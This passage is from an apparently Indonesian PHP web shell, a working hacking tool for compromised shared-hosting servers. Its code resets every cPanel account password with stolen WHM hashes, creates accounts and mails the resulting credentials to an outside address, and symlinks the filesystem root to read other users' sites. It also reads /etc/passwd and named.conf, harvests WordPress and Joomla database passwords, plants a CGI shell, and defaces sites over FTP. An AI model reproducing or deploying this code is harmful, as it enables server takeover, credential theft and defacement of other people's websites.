$test->init("$anu1","$anu2","$anu3");
$result=$test->passwd("$User","$newpass");
print $result;
echo "</center></div>";
echo "</div>";}}
//cek package
set_time_limit(0);
if(isset($_POST['cek-pkgs'])){
$whm_host = $_POST['host'];
$whm_user = $_POST['admin'];
$whm_key  = $_POST['hash'];
if (!file_exists($whm_metode)) {
die($whm_metode . " does not exist. Please update program
with correct path to your WHM interface file.");}
if (!empty($whm_key)) {
require_once $whm_metode;
$tes = listpkgs ($whm_host, $whm_user, $whm_key, $whm_ssl);
if($tes){
echo '<pre>';
print_r($tes);
echo '</pre>';
}
}
}

//suspended
set_time_limit(0);
if(isset($_POST['suspended'])){
echo '<div class="result">';
echo '<div class="a">';
$anu1 = $_POST['host'];
$anu2 = $_POST['admin'];
$anu3 = $_POST['hash'];
$User = $_POST['User-name'];
if (!empty($anu2)) {
$test= new whm;
$test->init("$anu1","$anu2","$anu3");
$result=$test->suspend("$User");
print $result;
echo "</center></div>";
echo "</div>";}}

//hostname
set_time_limit(0);
if(isset($_POST['server'])){
echo '<div class="result">';
echo '<div class="a">';
$anu1 = $_POST['host'];
$anu2 = $_POST['admin'];
$anu3 = $_POST['hash'];
if (!empty($anu2)) {
$test= new whm;
$test->init("$anu1","$anu2","$anu3");
echo "<p><center>";
$host=$test->gethostname();
echo 'HostName : ';
echo $host;
echo '</p><p>Version : ';
$versi=$test->version();
echo $versi;
echo '</p></center></div></div>';}}

//cek hash
set_time_limit(0);
if(isset($_POST['tes'])){
echo '<div id="result">';
$whmhost = $_POST['host'];
$whmuser = $_POST['admin'];
$whmhash = $_POST['hash'];
function getVar($name, $def = '') {
  if (isset($_REQUEST[$name]))
    return $_REQUEST[$name];
  else
    return $def;
}
if (!empty($whmuser)) {

$query = "https://$whmhost:2087"; 
$curl = curl_init(); 
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0 ); 
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0 ); 
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); 
$header[0] = "Authorization: WHM $whmuser:" . preg_replace("'(
|
)'","",$whmhash); 
curl_setopt($curl,CURLOPT_HTTPHEADER,$header); 
curl_setopt($curl, CURLOPT_URL, $query); 
$result = curl_exec($curl); 
if ($result == false) { 
error_log("curl_exec threw error \"" . curl_error($curl) . "\" for $query"); 
} 
            curl_close($curl);
            if (strpos($result, "<noframes>WebHost Manager") !== false) {
                echo "<br/><center>Mantap Kang.!</b><br/>";
                echo "<br/>Setelah diteliti di ITB & IPB ternyata hash'nya:<br> &nbsp;&nbsp;&nbsp;<font color='green'>masih aktif.!! </font><br/>";
                } else {
                echo "<br/><center>Gatot Ga.!</b><br/>";
                  echo "<br/>Setelah diteliti di ITB & IPB ternyata hash'nya:<br> &nbsp;&nbsp;&nbsp;<font color='red'>Sudah tidak aktif lagi </font><br/>";
                  }
    }
}

//unsuspended
set_time_limit(0);
if(isset($_POST['unsuspend'])){
$whm_host = $_POST['host'];
$whm_user = $_POST['admin'];
$whm_key  = $_POST['hash'];
$User = $_POST['User-name'];
if (!file_exists($whm_metode)) {
die($whm_metode . " does not exist. Please update program
with correct path to your WHM interface file.");}
if (!empty($whm_key)) {
require_once $whm_metode;
$tes = unsuspend ($whm_host, $whm_user, $whm_key, $whm_ssl, $User);
if($tes){
echo '<pre>';
print_r($tes);
echo '</pre>';
}}
}

//fungsi create
set_time_limit(0);
$whm_interface_path = '/usr/local/cpanel/Cpanel/Accounting.php.inc';
function getVar($name, $def = '') {
  if (isset($_REQUEST[$name]))
    return $_REQUEST[$name];
  else
    return $def;
}
//create account
$II11II11II11II11 = fopen("olenktea.txt","a");
set_time_limit(0);
header('Content-Type: text/html; charset=UTF-8');
$whm_interface_path = '/usr/local/cpanel/Cpanel/Accounting.php.inc';
if (isset($_POST['create'])) {
    echo '<div id="result">';
    if (!isset($whm_user)) {
        $whm_user = getVar('admin');
    }
    if (!isset($whm_host)) {
        $whm_host = getVar('host');
    }
    $whm_usessl = 1;
    if (!isset($whm_key)) {
        $whm_key = getVar('hash');
    }
    if (!isset($user_domain)) {
        $user_domain = getVar('domain');
    }
    if (!isset($user_name)) {
        $user_name = getVar('User-name');
    }
    if (!isset($user_pass)) {
        $user_pass = getVar('password');
    }
    if (!isset($user_plan)) {
        $user_plan = getVar('plan');
    }
    if (!file_exists($whm_interface_path)) {
        die($whm_interface_path . " does not exist. Please update program with correct path to your WHM interface file.");
    }
    if(!empty($user_name)) {
require_once $whm_interface_path;
$result = createacct($whm_host,$whm_user,$whm_key,$whm_usessl,$user_domain,$user_name,$user_pass,$user_plan);
if(eregi("Account Creation Ok", $result)){
$awal = explode("Dns Zone check is enabled.", $result);
$filter = explode('Running', $awal[1]);
$memek = explode("| Domain: ", $result);
$memekjanda = explode('| Ip:', $memek[1]); 
$memekk = explode("| Ip:", $result);
$memekjandaa = explode('(n)', $memekk[1]);
$memekkk = explode("| UserName:",$result);
$memekjandaaa = explode("| PassWord:",$memekkk[1]);
$memekkkk = explode("| PassWord:",$result);
$memekjandaaaa = explode("| CpanelMod:",$memekkkk[1]);
$dari = '[email protected]';
$subject = 'Cpanel Remote Account';
$tujuan = '[email protected]'; 
$httpheader='From:'.$dari."rn".'To:'.$tujuan."rn".'Subjecbject:'.$subject."rn".'Content-type:text/plain;charset=iso-8859-1'."rn".'Sent:'.date('l, F d, Y H:i'); 
mail($tujuan,$subject,$filter[0],$httpheader);
echo "<center><br /><pre><font color=cyan>$filter[0]</font></pre>";
echo '<span class=X><nobr><img src="http://dedekuntoro.wapsite.me/images/salaman.gif"> ACCOUNT CREATED <img src="http://dedekuntoro.wapsite.me/images/goodluck.gif"></nobr><br></span>';
$separator = "+==========================./olenktea+rn";
fwrite($II11II11II11II11,$separator."New Account Information rn".$separator);
fwrite($II11II11II11II11,"WHM USER : ".$whm_user."rn");
fwrite($II11II11II11II11,"WHM HOST : ".$whm_host."rn");
 
fwrite($II11II11II11II11,$whm_key."rn");
fwrite($II11II11II11II11,$filter[0]."rn");
fwrite($II11II11II11II11,"rn");
 
fclose($II11II11II11II11); 
} else { 
echo "<center><h3>Failed </h3>";
}
if(eregi("Access Denied", $result)) {
echo "<center>Access Denied</center><br/><br/>";
} 
if(eregi("Sorry, a passwd entry for that username already exists.", $result)) {
echo "<center>Sorry, a passwd entry for that username already exists.</center><br/><br/>";
} 
if(eregi("Sorry, a DNS entry for", $result)){
echo "<center>Sorry, a DNS entry already exists</center><br/><br/>";
}
} 
echo "<br /><br />";
}
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk13')) {
?>
<form action="?&amp;idb=olenk13" method="post">
<?php
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ GANTI SEMUA PASSWORD CP ]]=-</b></th></center></tr>';
echo '<tr><td>hash</td><td><textarea class=olenk2 cols=40 rows=10 name="hash"></textarea></td></tr>';
echo '<tr><td>hostname</td><td><input class=olenk2 type=text size=40 name="host" value=""></td></tr>';
echo '<tr><td>admin</td><td><input class=olenk2 type=text size=40 name="admin" value=""></td></tr>';
echo '<tr><td>pass baru</td><td><input class=olenk2 type=text size=40 name="newpass" value=""></td></tr>';
echo '</table>';
echo '<input class=olenk3 type="submit"
name="ganti" value="ganti kabeh">';
echo '<pre>';
echo '</pre>';
//mulai eksekusi
set_time_limit(0);
if(isset($_POST['ganti'])){
$whmhost = $_POST['host'];
$whmuser = $_POST['admin'];
$whmhash = $_POST['hash'];
$newpassword = $_POST['newpass'];
$query="https://$whmhost:2087/json-api/listaccts";
$curl=curl_init();
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0 );
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0 );
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
$header[0]="Authorization: WHM $whmuser:" . preg_replace ("'(
|
)'","",$whmhash);
curl_setopt($curl,CURLOPT_HTTPHEADER,$header);
curl_setopt($curl, CURLOPT_URL, $query);
$result=curl_exec($curl);
if ($result == false) {
error_log("curl_exec threw error \"" . curl_error($curl) . "\" for $query"); 
}
curl_close($curl);
$result=json_decode($result);
foreach ($result->acct as $acct){
$user=$acct->user;
$pass=$newpassword;
$login = "<a href=http://$whmhost:2082/login/?user=$user&pass=$pass>login cpanel</a>";
$query1="https://".$whmhost.":2087/json-api/passwd?user=".$user."&pass=".$pass;
$curl1=curl_init();
curl_setopt($curl1, CURLOPT_SSL_VERIFYHOST,0 );
curl_setopt($curl1, CURLOPT_SSL_VERIFYPEER,0 );
curl_setopt($curl1, CURLOPT_RETURNTRANSFER,1);
$header[0]="Authorization: WHM $whmuser:" . preg_replace ("'(
|
)'","",$whmhash);
curl_setopt($curl1,CURLOPT_HTTPHEADER,$header);
curl_setopt($curl1, CURLOPT_URL, $query1);
$result1=curl_exec($curl1);
if ($result1 == false) {
error_log("curl_exec threw error \"" . curl_error($curl1) . "\" for $query1"); 
}
curl_close($curl1);
$hasil=json_decode($result1);
echo "<pre>";
foreach ($hasil->passwd as $sm){
$change=$sm->statusmsg;
echo "$change <br><center><br>$login<br>";
$file = fopen("olenk.txt", "a");
fputs($file, "$login <hr>");
fclose($file);
}
}
}
}
?>
<?php
if(isset($_GET['roct']) && ($_GET['roct'] == 'olenk2'))
    {
    @session_start();
    @set_time_limit(0);
    @ini_set('max_execution_time', 0);
    if ($win) {
        echo "<center><br/><br/><nobr><span class='olenk5'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
    }
    @mkdir('roct1', 0777);
    $sempak = "Options all 
 
DirectoryIndex roct.html 
 
AddType text/plain .php 
 
AddHandler server-parsed .php 
  
AddType text/plain .html 
 
AddHandler txt .html 
 
Require None 
 
Satisfy Any";
    $masuk = @fopen('roct1/.htaccess', 'w');
    fwrite($masuk, $sempak);
    @symlink('/', 'roct1/roct.txt');
    $pg = basename(__FILE__);
    if (is_readable("/var/named")) {
        echo '<center><br/><br/><nobr><b><span class="olenk4">-=[[ SYMLINK</span> <span class="olenk5">VAR/NAMED ]]=-</span></b></nobr><br/><br/></center>
<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
<td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
<td align="center"> <font color="white"> <b>_USERS_</b></td>
<td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
        $list = scandir("/var/named");
        foreach ($list as $domain) {
            if (strpos($domain, ".db")) {
                @error_reporting(0);
                @ini_set('log_errors', 0);
                @ini_set('error_log', NULL);
                $i+= 1;
                $domain = str_replace('.db', '', $domain);
                $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
                echo "<tr>
<td><a class='olenk4' href='http://" . $domain . " '>" . $domain . "</a></td>
<td align='center'><font color='white'>" . $owner['name'] . "</td>
<td align='center'><a href='roct1/roct.txt" . $owner['dir'] . "/public_html/' target='_blank'>Symlink</a></td>";
            }
        }
        flush();
        flush();
    }
    echo "</tr></table></div></html>";
}
if(isset($_GET['roct']) && ($_GET['roct'] == 'olenk3'))
    {    
    @session_start();
    @set_time_limit(0);
    @error_reporting(0);
    @ini_set('log_errors', 0);
    @ini_set('error_log', NULL);
    @ini_set('max_execution_time', 0);
    if ($win) {
        echo "<center><br/><br/><nobr><span class='olenk5'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
    }
    @mkdir('roct2', 0777);
    $sempak = "Options all 
 
DirectoryIndex roct.html 
 
AddType text/plain .php 
 
AddHandler server-parsed .php 
  
AddType text/plain .html 
 
AddHandler txt .html 
 
Require None 
 
Satisfy Any";
    $masuk = @fopen('roct2/.htaccess', 'w');
    fwrite($masuk, $sempak);
    @symlink('/', 'roct2/roct.txt');
    $pg = basename(__FILE__);
    if (is_readable("/etc/passwd-")) {
        $gelartiker = 'file_get_contents';
        $seret = '/etc/passwd-';
        $isikarung = $gelartiker($seret);
        $buka = fopen('maho.txt', 'w');
        fwrite($buka, $isikarung);
    }
    if (isset($_GET['file']) or @filesize('maho.txt') > 0) {
        $cont = stripcslashes($_POST['file']);
        if (!file_exists('maho.txt')) {
            $f = @fopen('maho.txt', 'w');
            $w = @fwrite($f, $cont);
            fclose($f);
        }
        if ($w or @filesize('maho.txt') > 0) {
            echo "<center><br/><br/><nobr><b><span class='olenk4'>-=[[ SYMLINK</span> <span class='olenk5'>ETC/PASSWD- ]]=-</span></b></nobr><br/><br/><table align='center' border='3' width='400' cellspacing='0' cellpadding='0'> 
<td align='center'> <font color='white'> <b>_USERS_</b></td>
<td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
            flush();
            $fil3 = file('maho.txt');
            foreach ($fil3 as $f) {
                $u = explode(':', $f);
                $user = $u['0'];
                echo "<tr>
<td align='center'><font color='white'>$user</td>
<td align='center'><a class='olenk4' href='roct2/roct.txt/home/$user/public_html' target='_blank'>Symlink</a></td></tr>";
                flush();
                flush();
            }
            echo "</tr></table></div></html>";
        }
    }
}
if(isset($_GET['roct']) && ($_GET['roct'] == 'olenk4'))
    {
    @session_start();
    @set_time_limit(0);
    @error_reporting(0);
    @ini_set('log_errors', 0);
    @ini_set('error_log', NULL);
    @ini_set('max_execution_time', 0);
    if ($win) {
        echo "<center><br/><br/><nobr><span class='olenk5'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
    }
    @mkdir('roct3', 0777);
    $sempak = "Options all 
 
DirectoryIndex roct.html 
 
AddType text/plain .php 
 
AddHandler server-parsed .php 
  
AddType text/plain .html 
 
AddHandler txt .html 
 
Require None 
 
Satisfy Any";
    $masuk = @fopen('roct3/.htaccess', 'w');
    fwrite($masuk, $sempak);
    @symlink('/', 'roct3/roct.txt');
    $pg = basename(__FILE__);
    $etc = file_get_contents("/etc/passwd");
    $etcz = explode("
", $etc);
    if (is_readable("/etc/passwd")) {
        echo '<center><br/><br/><nobr><b><span class="olenk4">-=[[ SYMLINK</span> <span class="olenk5">ETC/PASSWD ]]=-</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
        echo '<tr>
<td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
<td align="center"> <font color="white"> <b>_USERS_</b></td>
<td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
        $list = scandir("/var/named");
        foreach ($etcz as $etz) {
            $etcc = explode(":", $etz);
            foreach ($list as $domain) {
                if (strpos($domain, ".db")) {
                    $domain = str_replace('.db', '', $domain);
                    $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
                    if ($owner['name'] == $etcc[0]) {
                        $i+= 1;
                        echo "<tr>
<td><a class='olenk4' href='http://" . $domain . " '>" . $domain . "</a></td>
<td align='center'><font color='white'>" . $owner['name'] . "</font></td>
<td align='center'><a href='roct3/roct.txt" . $owner['dir'] . "/public_html/' target='_blank'>Symlink</a></td>";
                    }
                }
            }
        }
        flush();
        flush();
    }
    echo "</tr></table></div></html>";
}
if(isset($_GET['roct']) && ($_GET['roct'] == 'olenk5'))
    {
    @session_start();
    @set_time_limit(0);
    @error_reporting(0);
    @ini_set('log_errors', 0);
    @ini_set('error_log', NULL);
    @ini_set('max_execution_time', 0);
    if ($win) {
        echo "<center><br/><br/><nobr><span class='olenk5'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
    }
    @mkdir('roct4', 0777);
    $sempak = "Options all 
 
DirectoryIndex roct.html 
 
AddType text/plain .php 
 
AddHandler server-parsed .php 
  
AddType text/plain .html 
 
AddHandler txt .html 
 
Require None 
 
Satisfy Any";
    $masuk = @fopen('roct4/.htaccess', 'w');
    fwrite($masuk, $sempak);
    @symlink('/', 'roct4/roct.txt');
    $pg = basename(__FILE__);
    if (is_readable("/etc/named.conf")) {
        echo '<center><br/><br/><nobr><b><span class="olenk4">-=[[ SYMLINK</span> <span class="olenk5">ETC/NAMED.CONF ]]=-</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
        echo '<tr>
<td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
<td align="center"> <font color="white"> <b>_USERS_</b></td>
<td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
        $named = file_get_contents("/etc/named.conf");
        preg_match_all('%zone \"(.*)\" {%', $named, $domains);
        foreach ($domains[1] as $domain) {
            $domain = trim($domain);
            $i+= 1;
            $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
            echo "<tr>
<td><a class='olenk4' href='http://" . $domain . " '>" . $domain . "</a></td>
<td align='center'><font color='white'>" . $owner['name'] . "</font></td>
<td align='center'><a href='roct4/roct.txt" . $owner['dir'] . "/public_html' target='_blank'>Symlink</a></td>";
        }
        flush();
        flush();
    }
    echo "</tr></table></div></html>";
}
if(isset($_GET['roct']) && ($_GET['roct'] == 'olenk6'))
    {
    @session_start();
    @set_time_limit(0);
    @error_reporting(0);
    @ini_set('log_errors', 0);
    @ini_set('error_log', NULL);
    @ini_set('max_execution_time', 0);
    if ($win) {
        echo "<center><br/><br/><nobr><span class='olenk5'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
    }
    @mkdir('roct5', 0777);
    $sempak = "Options all 
 
DirectoryIndex roct.html 
 
AddType text/plain .php 
 
AddHandler server-parsed .php 
  
AddType text/plain .html 
 
AddHandler txt .html 
 
Require None 
 
Satisfy Any";
    $masuk = @fopen('roct5/.htaccess', 'w');
    fwrite($masuk, $sempak);
    @symlink('/', 'roct5/roct.txt');
    $pg = basename(__FILE__);
    $read_named_conf = @file('/etc/named.conf');
    if (!$read_named_conf) {
        echo "<center><br/><br/><nobr><span class='olenk5'>Can't Read File etc/named.conf :(</span></nobr><br/><br/>";
    } else {
        echo "<center><br/><br/><nobr><b><span class='olenk4'>-=[[ SYMLINK</span> <span class='olenk5'>ETC/NAMED.CONF II ]]=-</span></b></nobr><br/><br/> <table border='3' bordercolor='#FF0000' width='400' cellpadding='1' cellspacing='0'>
<td align='center'> <font color='white'> <b>_DOMAINS_</b></td>
<td align='center'> <font color='white'> <b>_USERS_</b></td>
<td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
        foreach ($read_named_conf as $subject) {
            if (eregi('zone', $subject)) {
                preg_match_all('#zone"(.*)"#', $subject, $string);
                flush();
                if (strlen(trim($string[1][0])) > 2) {
                    $UID = posix_getpwuid(@fileowner('/etc/valiases/' . $string[1][0]));
                    $name = $UID['name'];
                    @symlink('/', 'roct5/roct.txt');
                    $name = $string[1][0];
                    $australia = '\.au';
                    $bangladesh = '\.bd';
                    $brazil = '\.br';
                    $malaysia = '\.my';
                    $myanmar = '\.mm';
                    $indonesia = '\.id';
                    $israel = '\.il';
                    $romania = '\.ro';
                    $edu = '\.edu';
                    $gov = '\.gov';
                    $go = '\.go';
                    $gob = '\.gob';
                    $mil = '\.mil';
                    if (eregi("$australia", $string[1][0]) or eregi("$bangladesh", $string[1][0]) or eregi("$brazil", $string[1][0]) or eregi("$malaysia", $string[1][0]) or eregi("$myanmar", $string[1][0]) or eregi("$indonesia", $string[1][0]) or eregi("$israel", $string[1][0]) or eregi("$romania", $string[1][0]) or eregi("$edu", $string[1][0]) or eregi("$gov", $string[1][0]) or eregi("$go", $string[1][0]) or eregi("$gob", $string[1][0]) or eregi("$mil", $string[1][0]) or eregi("$mil2", $string[1][0])) {
                        $name = "<div style=' color:yellow ; text-shadow: 0px 0px 1px red; '>" . $string[1][0] . '</div>';
                    }
                    echo "<tr>
<td><a class='olenk4' target='_blank' href=http://" . $string[1][0] . '/>' . $name . ' </a></center></div></td>
<td align=center><font color=white>' . $UID['name'] . "</td>
<td align=center><a href='roct5/roct.txt/home/" . $UID['name'] . "/public_html/' target='_blank'>Symlink </a></td></tr>";
                    flush();
                }
            }
        }
    }
    flush();
    flush();
    echo "</tr></table></div></html>";
}
if(isset($_GET['roct']) && ($_GET['roct'] == 'olenk7'))
    {
    @session_start();
    @set_time_limit(0);
    @error_reporting(0);
    @ini_set('log_errors', 0);
    @ini_set('error_log', NULL);
    @ini_set('max_execution_time', 0);
    if ($win) {
        echo "<center><br/><br/><nobr><span class='olenk5'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
    }
    @mkdir('roct6', 0777);
    $sempak = "Options all 
 
DirectoryIndex roct.html 
 
AddType text/plain .php 
 
AddHandler server-parsed .php 
  
AddType text/plain .html 
 
AddHandler txt .html 
 
Require None 
 
Satisfy Any";
    $masuk = @fopen('roct6/.htaccess', 'w');
    fwrite($masuk, $sempak);
    @symlink('/', 'roct6/roct.txt');
    $pg = basename(__FILE__);
    if (is_readable("/etc/valiases")) {
        echo '<center><br/><br/><nobr><b><span class="olenk4">-=[[ SYMLINK</span> <span class="olenk5">ETC/VALIASES ]]=-</span></b></nobr><br/><br/> <table align="center" border="3" width="300" cellspacing="0" cellpadding="4">';
        echo '<tr>
<td align="center"><font color="white"> <b>_DOMAINS_</b></td>
<td align="center"><font color="white"> <b>_USERS_</b></td>
<td align="center"><font color="white"> <b>SYMLINK</b></td>';
        $list = scandir("/etc/valiases");
        foreach ($list as $domain) {
            $i+= 1;
            $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
            echo "<tr>
<td><a class='olenk4' href='http://" . $domain . " '>" . $domain . "</a></td>
<td align='center'><font color='white'>" . $owner['name'] . "</font></td>
<td align='center'><a href='roct6/roct.txt" . $owner['dir'] . "/public_html' target='_blank'>Symlink</a>/td>";
        }
        flush();
        flush();
    }
    echo "</tr></table></div></html>";
}
?>
<?php
if (isset($_GET['pbm']) && ($_GET['pbm'] == 'telnet')) {
echo "<center><br/><br/><nobr><b><span class='olenk4'>-=[[ CGI </span> <span class='olenk5'> SHELL ]]=-</span></b></nobr><br/><br/> ";
    echo "</br></br><center><b><span class='olenk6'> Cek : <a class=olenk4 href='pbm_zone/pbm.zone' target='_blank'>[+] DI SINI [+]</a></center></span></br>";
    mkdir('pbm_zone', 0755);
    chdir('pbm_zone');
    $puting = ".htaccess";
    $buahdada = "$puting";
    $file = fopen($buahdada, 'w');
    $susu = "AddHandler cgi-script .zone";
    fwrite($file, $susu);
    fclose($file);
    $lamot = '';
$file = fopen("pbm.zone", "w+");
    $write = fwrite($file, base64_decode($lamot));
    fclose($file);
    chmod("pbm.zone", 0755);
    echo "<iframe src=pbm_zone/pbm.zone width=96% height=76% frameborder=0></iframe>";
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk14')) {
?>
<form action="?&amp;idb=olenk14" method="post">
<?php
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ CPANEL AUTO DEFACE ]]=-</b></th></center></tr>';
echo '<tr><td>ip</td><td><input class=olenk2 type=text size=40 name="hi" value=""></td></tr>';
echo '<tr><td>user</td><td><input class=olenk2 type=text size=40 name="tx" value=""></td></tr>';
echo '<tr><td>pass</td><td><input class=olenk2 type=text size=40 name="p" value=""></td></tr>';
echo '<tr><td>file</td><td><input class=olenk2 type=text size=40 name="ph" value="index.php"></td></tr>';
echo '<tr><td>url file</td><td><input class=olenk2 type=text size=40 name="deface" value=""></td></tr></table>';
echo'<input class=olenk3 type=submit name=sm value="deface"></form>';
//eksekusi
if(isset($_POST['sm']))
{
    $ip=trim($_POST['hi']);
    $u=trim($_POST['tx']);
    $p=trim($_POST['p']);
    $d=trim($_POST['ph']);
    $df=trim($_POST['deface']);
//hasil
echo'<table class=tabnet>';
echo '<tr><td>ip</td><td><input class=olenk type=text size=40 value='.$ip.'></td></tr>';
echo '<tr><td>user</td><td><input class=olenk type=text size=40 value='.$u.'></td></tr>';
echo '<tr><td>pass</td><td><input class=olenk type=text size=40 value='.$p.'></td></tr>';
echo '<tr><td>file</td><td><input class=olenk type=text size=40 value='.$d.'></td></tr>';
echo '<tr><td>url file</td><td><input class=olenk type=text size=40 value='.$df.'></td></tr></table>';

    $dl="public_html/".$d;
    $si= ftp_connect($ip);    

$try= ftp_login($si,$u,$p);
if ((!$si) || (!$try))
{
        echo "<br><span class=olenk5>koneksi gagal kang T_T</span>";
        exit;
}
else
{
        echo "<br><span class=olenk5>~~~~~~~~~~~~~~~~~~~~~~~~~</span><br><span class=olenk4>sukses tersambung ke server</span><br>";
}
$deface = ftp_put($si, $dl , $df, FTP_BINARY);
if ($deface)
{
        echo "<span class=olenk5>~~~~~~~~~~~~~~~~~~~~~~~~~</span><br><span class=olenk4>tebas index sukses kang ^_^</span><br><span class=olenk5>~~~~~~~~~~~~~~~~~~~~~~~~~</span><br>";
}
else
{
        echo "<span class=olenk5>gagal kang.......coba manual T_T </span>";
}
    }
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk15')) { ?>
<form action="?idb=olenk15" method="post">
<?php
@ini_set('display_errors',0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}

echo "<center>";
$d0mains = @file('/etc/named.conf');
$domains = scandir("/var/named");
 
if ($domains or $d0mains)
{
    $domains = scandir("/var/named");
    if($domains) {
echo "<table class=olenk2 align='center'><tr><th class=olenk3> COUNT </th><th class=olenk3> DOMAIN </th><th class=olenk3> USER </th><th class=olenk3> wp-config </th></tr>";
$count=1;
$dc = 0;
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dirz = '/home/'.$owner['name'].'/public_html/wp-config.php';
$path = getcwd();
 
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td class=olenk2>".$count++."</td><td class=olenk2><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td class=olenk2>".$owner['name']."</td><td class=olenk2>".$password."</td><td class=olenk2><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
$dc++;
}
 
}
}
echo '</table>';
$total = $dc;
echo '<br><div class="olenk2">Wp config Found = '.$total.'</h3><br />';
echo '</center>';
}else{
$d0mains = @file('/etc/named.conf');
    if($d0mains) {
echo "<table class=olenk2 align='center'><tr><th class=olenk3> COUNT </th><th class=olenk3> DOMAIN </th><th class=olenk3> USER </th><th class=olenk3> wp-config </th></tr>";
$count=1;
$dc = 0;
$mck = array();
foreach($d0mains as $d0main){
    if(@eregi('zone',$d0main)){
        preg_match_all('#zone "(.*)"#',$d0main,$domain);
        flush();
        if(strlen(trim($domain[1][0])) >2){
            $mck[] = $domain[1][0];
        }
    }
}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
    $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
    $usr[] = $infos['name'];
    $dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
    $r = explode(':',$d);
    if(strpos($r[5],'home')) {
        $passwd[$r[0]] = $r[5];
    }
}
$l=0;
$j=1;
foreach($usr as $r) {
$dirz = '/home/'.$r.'/public_html/wp-config.php';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$r.'.txt');
$p=file_get_contents(''.$path.'/'.$r.'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td class=olenk2>".$count++."</td><td class=olenk2><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td class=olenk2>'.$r."</td><td class=olenk2>".$password."</td><td class=olenk2><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
$dc++;
                flush();
                $l=$l?0:1;
                $j++;
                                }
            }
                        }
echo '</table>';
$total = $dc;
echo '<br><div class="olenk2">Total config Found = '.$total.'</h3><br />';
echo '</center>';
 
}
}else{
echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
}
echo "<center>";
$d0mains = @file('/etc/named.conf');
$domains = scandir("/var/named");
 
if ($domains or $d0mains)
{
    $domains = scandir("/var/named");
    if($domains) {
echo "<table class=olenk2 align='center'><tr><th class=olenk3> COUNT </th><th class=olenk3> DOMAIN </th><th class=olenk3> USER </th><th class=olenk3> config </th></tr>";
$count=1;
$dc = 0;
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dirz = '/home/'.$owner['name'].'/public_html/configuration.php';
$path = getcwd();
 
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td class=olenk2>".$count++."</td><td class=olenk2><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td class=olenk2>".$owner['name']."</td><td class=olenk2>".$password."</td><td class=olenk2><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
$dc++;
}
 
}
}
echo '</table>';
$total = $dc;
echo '<br><div class="olenk2">Total config Found = '.$total.'</h3><br />';
echo '</center>';
}else{
$d0mains = @file('/etc/named.conf');
    if($d0mains) {
echo "<table class=olenk2 align='center'><tr><th class=olenk3> COUNT </th><th class=olenk3> DOMAIN </th><th class=olenk3> USER </th><th class=olenk3> config </th></tr>";
$count=1;
$dc = 0;
$mck = array();
foreach($d0mains as $d0main){
    if(@eregi('zone',$d0main)){
        preg_match_all('#zone "(.*)"#',$d0main,$domain);
        flush();
        if(strlen(trim($domain[1][0])) >2){
            $mck[] = $domain[1][0];
        }
    }
}
$mck = array_unique($mck);
